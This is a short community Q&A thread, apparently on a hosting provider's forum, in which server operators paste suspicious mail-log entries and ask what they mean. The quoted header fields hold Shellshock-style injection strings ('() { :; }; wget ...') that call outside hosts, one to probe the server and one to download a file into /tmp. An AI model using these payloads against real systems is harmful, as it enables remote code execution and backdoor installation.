Question
Odd mail hack attempt - can mail pull a wget?
My mail log for “nobody@[mydomain.com]” shows this for every field - “To:”, “Date:” - all fields. It is from a Chinese IP address. The IP address in the wget is a DigitalOcean address, and the second IP is my server. It appears to be a dead link at this point.
Subject:() { :; };wget http://104.131.141.12:443/vul/[my-ip-address]
Any ideas? I’m lost on the ’ { :; }; ’ - is there a mail function that will execute the wget?
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
×
I have the same question. I get bounce backs for undeliverable email when it hits my mail server and one of the emails looked like this. What vulnerability is this person trying to exploit?
From () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
Subject:() { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
To () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
CC () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback